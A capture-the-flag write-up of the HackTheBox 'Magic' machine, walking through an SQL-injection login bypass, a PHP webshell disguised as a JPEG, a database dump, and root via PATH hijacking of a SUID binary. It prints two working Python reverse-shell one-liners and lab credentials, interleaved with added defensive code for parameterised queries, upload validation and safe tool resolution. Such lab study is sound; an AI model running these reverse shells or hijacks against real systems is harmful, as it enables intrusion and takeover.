HackTheBox Magic Writeup – 10.10.10.185


Hey guys, I’m back with another writeup. This time it is the writeup of the new Magic (10.10.10.185) Linux machine by TRX, released by HackTheBox on 18th April. The machine is classified as Medium difficulty and is worth 30 points.

DIFFICULTY: MEDIUM

A very simple and straightforward box with SQLi exploitation for the initial foothold. The machine has a number of vulnerabilities: a file upload vulnerability, a login page authentication bypass using SQLi, uploading a webshell (for me at least; some used different techniques), reading the MySQL database, etc.

Let us begin.

Enumeration

As always, I add the machine IP to the hosts file as magic.htb and proceed with the NMAP scan.

NMAP Scan Results:

$ nmap -T4 -A -sV -sS magic.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-20 09:07 +03
Nmap scan report for magic.htb (10.10.10.185)
Host is up (0.12s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
|   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
|_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Magic Portfolio
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/20%OT=22%CT=1%CU=44149%PV=Y%DS=2%DC=T%G=Y%TM=5E9D3C3
OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   117.80 ms 10.10.14.1
2   117.82 ms magic.htb (10.10.10.185)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.38 seconds

The NMAP scan shows SSH on port 22 and an Apache web server on port 80. I proceed to inspect port 80.

There is an image portfolio website running on the Apache web server. I noticed a login page and tried admin:admin and a couple of other common credentials to see if they work, but no luck.

After a couple of tries, I used simple SQL injection payloads as credentials, and to my surprise it worked and I was logged in.
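To show why a login form can be bypassed with a payload typed into the username field, here is an added example (not code from the box or from this post) that builds the same kind of query two ways: once by string concatenation, which is the vulnerable pattern, and once with a bound parameter, which is the fix. The table, the user and the password are constructed for the demo; the comment-out payload is the classic textbook one.

```python
import hashlib
import sqlite3


def _hash(pw: str) -> str:
    # Stand-in for a real password hash; the point here is the query, not the hashing.
    return hashlib.sha256(pw.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    # Constructed in-memory "login" table with a single admin row.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT NOT NULL, password TEXT NOT NULL)"
    )
    conn.execute(
        "INSERT INTO login (username, password) VALUES (?, ?)",
        ("admin", _hash("correct-horse")),
    )
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # The raw username is pasted into the SQL text, so a quote and a comment marker
    # in the username rewrite the WHERE clause and the password check is never evaluated.
    query = (
        f"SELECT id FROM login WHERE username = '{username}' "
        f"AND password = '{_hash(password)}'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: the driver binds the values, so they are data, never SQL.
    query = "SELECT id FROM login WHERE username = ? AND password = ?"
    return conn.execute(query, (username, _hash(password))).fetchone() is not None


def demo() -> dict:
    """Compare both implementations on a valid login and on the classic comment-out payload."""
    conn = make_db()
    payload_user = "admin'-- "  # closes the string literal, comments out the rest of the WHERE clause
    return {
        "valid_vulnerable": login_vulnerable(conn, "admin", "correct-horse"),
        "valid_safe": login_safe(conn, "admin", "correct-horse"),
        "wrong_pw_safe": login_safe(conn, "admin", "wrong"),
        "payload_vulnerable": login_vulnerable(conn, payload_user, "anything"),
        "payload_safe": login_safe(conn, payload_user, "anything"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The vulnerable function accepts the payload because the database sees `username = 'admin'` followed by a comment; the parameterised function looks for a user literally named `admin'-- ` and finds nothing. Logging failed logins whose username contains a quote or `--` is a cheap detection for this class of attempt.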

Once logged in, there is an upload button for images. Only the image formats JPG, JPEG and PNG are allowed to be uploaded.

Reverse Shelling Using PHP WebShell

I recall an old machine with a similar scenario, where at one point I had to upload a PHP webshell to gain access to the system. So I decided to do the same. When I think of a PHP webshell, I think of WhiteWinterWolf’s PHP webshell.

I downloaded the webshell, renamed it to nav1n.php.jpeg and added the JPEG magic bytes at the beginning of the file. I went ahead and uploaded the file.

After the successful upload, my PHP webshell is ready. However, while I was preparing the reverse shell command I noticed my shell was gone; then I realized that the uploaded files are deleted after a minute or so.
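The upload filter on this box could be passed by giving a script a double extension and a JPEG header. As an added example (not the box's code, and not from the original post), here is an upload validator written the way a defender would want it: it rejects any executable extension anywhere in the filename, requires exactly one allowed extension, checks that the magic bytes match that extension, and stores the file under a random name it chose itself. The sample payloads and the extension lists are constructed for the demo.

```python
import os
import secrets

# Allowed image extensions and the magic bytes each one must start with.
ALLOWED_MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
}
# Extensions that a web server may hand to an interpreter; never allowed anywhere in the name.
EXEC_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "cgi", "pl", "py", "sh"}


def check_magic_only(data: bytes) -> bool:
    # Naive filter: "does it start like an image?"  Prepending a JPEG header passes this.
    return any(data.startswith(magic) for magic in ALLOWED_MAGIC.values())


def validate_upload(filename: str, data: bytes):
    """Return (accepted, reason, stored_name). stored_name is None when rejected."""
    base = os.path.basename(filename).lower()
    parts = base.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension", None
    exts = parts[1:]
    # nav1n.php.jpeg has 'php' in its extension chain -> rejected regardless of the last part.
    if any(ext in EXEC_EXTS for ext in exts):
        return False, "executable extension in filename", None
    if len(exts) != 1:
        return False, "multiple extensions", None
    ext = exts[0]
    if ext not in ALLOWED_MAGIC:
        return False, "extension not allowed", None
    if not data.startswith(ALLOWED_MAGIC[ext]):
        return False, "content does not match declared extension", None
    # Defence in depth: a genuine image has no reason to carry a PHP open tag.
    if b"<?php" in data or b"<?=" in data:
        return False, "script tag inside file body", None
    # Never reuse the client's filename; choose the stored name and extension server-side.
    stored = f"{secrets.token_hex(16)}.{ext}"
    return True, "ok", stored


# Constructed samples: a PNG header plus padding, and a JPEG header with a PHP tag glued on.
PNG_SAMPLE = ALLOWED_MAGIC["png"] + b"\x00" * 16
DISGUISED_SAMPLE = b"\xff\xd8\xff\xe0" + b"<?php /* constructed placeholder body */ ?>"


def demo() -> dict:
    return {
        "naive_accepts_disguised": check_magic_only(DISGUISED_SAMPLE),
        "strict_accepts_disguised": validate_upload("nav1n.php.jpeg", DISGUISED_SAMPLE)[0],
        "strict_accepts_png": validate_upload("photo.png", PNG_SAMPLE)[0],
        "png_stored_ext": validate_upload("photo.png", PNG_SAMPLE)[2].rsplit(".", 1)[1],
        "strict_accepts_mismatch": validate_upload("photo.jpeg", PNG_SAMPLE)[0],
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Even with this check in place, the upload directory should be served with script execution disabled (for Apache, `php_admin_flag engine off` in the directory's configuration), so that a file which slips through is still only ever sent back as bytes, never run.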

With my webshell uploaded and the reverse shell script ready, I prepared my listener and executed the simple Python reverse shell command through the webshell. And boom, I have a reverse shell in my listener as www-data.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9998));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

I started to enumerate the www/Magic folder and noticed a PHP file called “db.php5”. I cat it and found credentials for the user theseus.

theseus:iamkingtheseus

However, these credentials didn’t work for switching user to theseus or for SSH. There must be some other way to escalate privileges, so I continued my enumeration.

Upon reading the code, I realized that the credentials are not for a system user; they are for the MySQL database. I proceeded to dump the database and read the tables to find any credentials stored there.

Dumping MySQL Database

Dumping a MySQL database is as easy as the command below. I have the DB credentials, so I tried it.

mysqldump -u [username] -p[password] [database_name] > [dump_file.sql]

I made a dumb mistake and kept getting “Access Denied”. I was certain that the credentials I had were correct. After a few tries I realized that the command I was using to dump the database was incorrect: in the mysqldump command there is no space between -u and the username or between -p and the password.

After fixing my command I got the database dump.

As I assumed, I found new credentials for the user admin in the “Login” table.

admin:Th3s3usW4sK1ng

Privilege Escalation As Theseus

When I tried to switch user to admin I still got access denied. But the password was for theseus, not “admin”. I logged in as theseus and grabbed user.txt immediately.

Privilege Escalation To Root

A quick SUID search revealed a few SUID binaries that the user theseus can run, among them sysinfo.

I ran sysinfo and the result showed the VM hardware information.

I somehow knew that sysinfo could help to get root, but honestly I’m quite weak at this. I DM’d one of the early rooters in the forum asking for help. He informed me that a custom-made fdisk with a reverse shell inside the temp directory will get you root when you run sysinfo.

I understood the process, but was still unsure how to run a “custom-made fdisk” inside the temp directory. I started to Google for more help and finally decided to gather everything and start.

What I did was create a file called “fdisk”, edit it with a text editor and add the following reverse shell code.

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

I set up my listener to listen on port 9999.

I uploaded the file to a new directory that I created inside the tmp directory.

I modified the permissions to make it executable.

And finally I ran sysinfo. And there I have a reverse shell as root in my listener.
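The root cause of this escalation is a SUID program that locates fdisk through the caller's PATH, so whoever controls PATH controls which "fdisk" runs. As an added example (not the box's sysinfo and not from the original post), here is how a privileged helper should resolve and run an external tool: it ignores the inherited PATH, looks only in a fixed list of non-world-writable system directories, and launches the tool with a clean environment. The demo plants a harmless stand-in fdisk (a constructed shell script that just echoes) in a temporary directory, puts that directory first in a PATH string, and compares a naive PATH lookup with the trusted one. The trusted directory list is an assumed policy, not something from the page.

```python
import os
import stat
import subprocess
import tempfile

# Assumed policy: the only directories a privileged helper will search for tools.
TRUSTED_DIRS = ("/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin")


def _is_executable_file(path: str) -> bool:
    try:
        st = os.stat(path)
    except (FileNotFoundError, PermissionError):
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_IXUSR)


def resolve_via_path(cmd: str, path_env: str):
    # What popen("fdisk -l") effectively does: first match in the caller-supplied PATH wins.
    for directory in path_env.split(os.pathsep):
        candidate = os.path.join(directory, cmd)
        if _is_executable_file(candidate):
            return candidate
    return None


def resolve_trusted(cmd: str, trusted=TRUSTED_DIRS):
    # Ignores the environment entirely and skips any trusted directory that is world-writable.
    for directory in trusted:
        if not os.path.isdir(directory):
            continue
        if os.stat(directory).st_mode & stat.S_IWOTH:
            continue
        candidate = os.path.join(directory, cmd)
        if _is_executable_file(candidate):
            return candidate
    return None


def run_trusted(cmd: str, *args: str) -> subprocess.CompletedProcess:
    # Absolute path plus a minimal, fixed environment: nothing the caller set is inherited.
    exe = resolve_trusted(cmd)
    if exe is None:
        raise FileNotFoundError(f"{cmd} not found in trusted directories")
    clean_env = {"PATH": os.pathsep.join(TRUSTED_DIRS)}
    return subprocess.run([exe, *args], env=clean_env, capture_output=True, text=True, check=False)


def demo_path_hijack() -> dict:
    """Plant a harmless stand-in 'fdisk' (constructed) in a temp dir and compare both resolvers."""
    with tempfile.TemporaryDirectory() as tmp:
        fake = os.path.join(tmp, "fdisk")
        with open(fake, "w") as fh:
            fh.write("#!/bin/sh\necho stand-in-fdisk\n")
        os.chmod(fake, 0o755)
        hijacked_path = tmp + os.pathsep + os.pathsep.join(TRUSTED_DIRS)
        naive = resolve_via_path("fdisk", hijacked_path)
        trusted = resolve_trusted("fdisk")
        return {
            "naive_picked_tmp": naive is not None and naive.startswith(tmp),
            "trusted_picked_tmp": trusted is not None and trusted.startswith(tmp),
            "naive": naive,
            "trusted": trusted,
        }


if __name__ == "__main__":
    for k, v in demo_path_hijack().items():
        print(f"{k}: {v}")
```

On the audit side, the same logic turns into a check: for every SUID binary found, look for calls that start an external program by bare name (popen/system with "fdisk", "lshw" and the like) and treat any such call that does not also reset PATH as a finding. A file named after a system tool appearing under /tmp, combined with a SUID binary being run, is also a straightforward thing to alert on from auditd or file-integrity logs.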

That’s all folks, this is how I rooted the Magic box. Thank you for dropping by and reading.

Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug bounty. If you are an HTB user and like my articles, please give respect here: Profile: https://www.hackthebox.eu/nav1n
